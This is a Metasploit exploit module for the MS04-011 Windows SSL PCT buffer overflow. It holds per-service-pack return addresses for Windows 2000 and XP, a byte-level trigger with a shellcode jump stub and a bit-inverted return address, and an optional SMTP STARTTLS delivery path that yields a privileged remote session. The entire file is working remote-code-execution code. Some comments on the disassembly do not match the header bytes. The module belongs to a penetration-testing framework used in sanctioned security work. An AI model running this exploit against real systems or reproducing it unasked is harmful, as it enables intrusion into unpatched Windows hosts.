##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
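class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Reply a target sends back when the PCT protocol is switched off. Seeing it
  # means the trigger has been sent but cannot have reached the vulnerable code.
  PCT_DISABLED_RESPONSE = "\x00\x00\x01".freeze

  # Module metadata. Exploitation is blind: there is exactly one attempt per
  # target, the return address is target-specific (see 'Targets'), and nothing
  # in the exchange lets the module confirm the OS/service-pack beforehand.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS04-011 Microsoft Private Communications Transport Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the Microsoft
          Windows SSL PCT protocol stack. This code is based on Johnny
          Cyberpunk's THC release and has been tested against Windows
          2000 and Windows XP. To use this module, specify the remote
          port of any SSL service, or the port and protocol of an
          application that uses SSL. The only application protocol
          supported at this time is SMTP. You only have one chance to
          select the correct target, if you are attacking IIS, you may
          want to try one of the other exploits first (WebDAV). If
          WebDAV does not work, this more than likely means that this
          is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS
          5.1). Using the wrong target may not result in an immediate
          crash of the remote system.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2003-0719'],
          [ 'OSVDB', '5250'],
          [ 'BID', '10116'],
          [ 'MSB', 'MS04-011'],
          ['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER],
          ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION]
        ],
        # The session obtained through this module is declared privileged.
        'Privileged' => true,
        'DefaultOptions' => {
          # Exit only the payload's thread, not the host process that owns the
          # SSL stack.
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 1800,
          # No bad characters are declared: the trigger is sent as a raw
          # record, not through a text protocol (for PROTO=smtp the payload
          # goes out after STARTTLS, still as raw bytes).
          'BadChars' => "",
          # Move ESP away from the payload before it runs so it does not
          # overwrite itself.
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        # One 'Ret' per service pack. Each is an indirect jump gadget; the
        # address is stored bit-inverted in the trigger (see build_trigger).
        'Targets' => [
          [
            'Windows 2000 SP4',
            {
              'Platform' => 'win',
              'Ret' => 0x67419ce8, # jmp [esp + 0x6c]
            },
          ],
          [
            'Windows 2000 SP3',
            {
              'Platform' => 'win',
              'Ret' => 0x67419e1d, # jmp [esp + 0x6c]
            },
          ],
          [
            'Windows 2000 SP2',
            {
              'Platform' => 'win',
              'Ret' => 0x6741a426, # jmp [esp + 0x6c]
            },
          ],
          [
            'Windows 2000 SP1',
            {
              'Platform' => 'win',
              'Ret' => 0x77e4f44d, # jmp [ebx + 0x14]
            },
          ],
          [
            'Windows 2000 SP0',
            {
              'Platform' => 'win',
              'Ret' => 0x7658a6cb, # jmp [ebx + 0x0e]
            },
          ],
          [
            'Windows XP SP0',
            {
              'Platform' => 'win',
              'Ret' => 0x0ffb7de9, # jmp [esp + 0x6c]
            },
          ],
          [
            'Windows XP SP1',
            {
              'Platform' => 'win',
              'Ret' => 0x0ffb832f, # jmp [esp + 0x6c]
            },
          ],
        ],
        'DisclosureDate' => '2004-04-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # 'raw' sends the trigger straight onto the connected port; 'smtp'
        # first walks the plaintext greeting/HELO/STARTTLS exchange.
        OptString.new('PROTO', [true, "The application protocol: raw or smtp", "raw"])
      ]
    )
  end

  # Connect, optionally negotiate STARTTLS, send the malformed PCT hello and
  # hand off to the payload handler.
  #
  # Every failure path prints an error and returns without raising.
  # NOTE(review): those early returns do not call disconnect; the Tcp mixin's
  # cleanup is assumed to close the socket — confirm.
  def exploit
    begin
      connect
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused => e
      print_error("Cannot connect: #{e.message}")
      return
    end

    print_status("Trying target #{target.name} with proto #{datastore['PROTO']}...")

    # For SMTP the PCT hello is only meaningful after STARTTLS, so the
    # plaintext preamble has to complete on this socket first.
    return if datastore['PROTO'] == 'smtp' && !smtp_starttls

    begin
      sock.put(build_trigger)
      resp = sock.get_once
    rescue ::Timeout::Error
      print_error("Timed out while sending the malicious data")
      return
    rescue ::EOFError => e
      print_error("Failed to receive a response after the malicious data: #{e.message}")
      return
    end

    # By this point the trigger and payload are already on the wire; this
    # message only explains why no session will come back. The target is
    # not exploitable over PCT in this state.
    if resp == PCT_DISABLED_RESPONSE
      print_status("The response indicates that the PCT protocol is disabled")
    end

    handler
    disconnect
  end

  private

  # Build the malformed PCT record that overflows the stack.
  #
  # The leading bytes double as the record header and as a short instruction
  # stub. Disassembly as recorded by the original author:
  #
  #   80620101     => and byte ptr [esi+1], 0x2
  #   bd00010001   => mov ebp, 0x1000100
  #   0016         => add [esi], dl
  #   8f8201000000 => pop [esi+1]
  #   eb0f         => jmp short 11 to shellcode
  #
  # The "jmp short" skips 0x0f = 15 bytes: the 11 bytes of 'X' padding plus
  # the 4-byte return address, landing on the encoded payload. The return
  # address is written XOR 0xffffffff (bit-inverted), as in the THC release
  # this module is based on; the target side undoes that before use —
  # verify against the disassembly before touching either the gadget
  # addresses or the inversion.
  #
  # @return [String] header stub + padding + inverted ret + payload
  def build_trigger
    header = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"
    jmp_over_padding = "\xeb\x0f"
    padding = 'X' * 11
    inverted_ret = [target.ret ^ 0xffffffff].pack('V')

    header + jmp_over_padding + padding + inverted_ret + payload.encoded
  end

  # Walk the plaintext SMTP preamble: read the greeting, send HELO, send
  # STARTTLS. Server replies are untrusted input and are only inspected for
  # the STARTTLS status code.
  #
  # @return [Boolean] true when all three exchanges completed; false after a
  #   timeout or a closed connection (the error has already been printed).
  #   A non-220 STARTTLS reply is reported as a warning but still returns
  #   true, so the trigger is sent regardless — matching the module's
  #   historical behaviour.
  def smtp_starttls
    begin
      sock.get_once
    rescue ::EOFError => e
      print_error("Failed to receive data for the protocol greeting: #{e.message}")
      return false
    end

    begin
      sock.put('HELO ' + rand_text_alphanumeric(rand(1..10)) + "\r\n")
      sock.get_once
    rescue ::Timeout::Error
      print_error("Timedout while sending HELO")
      return false
    rescue ::EOFError => e
      print_error("Failed to receive a response for HELO: #{e.message}")
      return false
    end

    begin
      sock.put("STARTTLS\r\n")
      resp = sock.get_once
    rescue ::Timeout::Error
      print_error("Timed out while sending STARTTLS")
      return false
    rescue ::EOFError => e
      print_error("Failed to receive a response for STARTTLS: #{e.message}")
      return false
    end

    # Anchor with \A rather than ^: ^ matches at the start of any line, so a
    # multi-line reply containing "220" somewhere would pass even when the
    # actual status line is not 220.
    if resp && resp !~ /\A220/
      print_warning("Warning: this server may not support STARTTLS")
    end

    true
  end
end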